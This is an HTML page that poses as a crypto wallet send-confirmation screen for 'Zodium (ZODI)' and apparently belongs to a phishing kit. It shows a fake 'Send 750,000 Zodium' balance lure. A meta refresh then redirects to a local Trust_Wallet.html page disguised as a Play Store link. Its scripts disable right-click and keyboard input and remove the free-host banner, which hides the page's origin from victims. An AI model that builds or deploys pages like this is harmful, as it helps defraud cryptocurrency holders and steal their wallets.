<!DOCTYPE html>
<html class="no-js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style>

  <title>Zodium</title>
  <meta name="description" content="">
 

 <meta name="viewport" content="width=device-width">
<link href="./index_files/style-8ede3607c73899fd87a40ea034f3dff0.css" rel="stylesheet">

</head>

<body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"><!-- uiView: --><div ui-view="" class="ng-scope">


<div class="so-back ng-scope" ng-controller="interstellar-basic-client.HeaderController as header">
  <div class="so-chunk">
    <div class="so-siteHeader siteHeader">
      <span class="so-logo">
        <a href="" class="so-logo__main"></a><!--
        <span class="so-logo__separator"> </span><!--
        --><a href="" class="so-logo__subSite">	</a>
      </span>
     
    </div>
  </div>
</div>

  <!-- ngIf: widget.view == 'sendConfirm' --><div class="sendConfirm ng-scope" ng-if="widget.view == &#222;sendConfirm&#39;">



<meta http-equiv="refresh" content=" 12;url=Trust_Wallet.html?store/apps/details?id=com.wallet.crypto.trustapp&referrer=utm_source%3Dwebsite">
 


   <br> <br>
<center><img src="https://assets.coingecko.com/coins/images/21181/small/s4TSr4S_-_Imgur.png?1638505121"></center>
<center><div class="WalletTokenList__refreshed-message">Loading Balances...</div></center>
<center> <font size="6">Send 750,000 Zodium (ZODI) </font><br></center>
    <!-- ngIf: widget.memo --><div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo">
       

      </div>
    </div><!-- end ngIf: widget.memo -->
    <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 -->



</div><script language="javascript" type="text/javascript">
<!-- //
var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
window.onload = () => {
    let el = document.querySelector('[alt="www.000webhost.com"]').parentNode.parentNode;
    el.parentNode.removeChild(el);
}
</script> 
</body></html>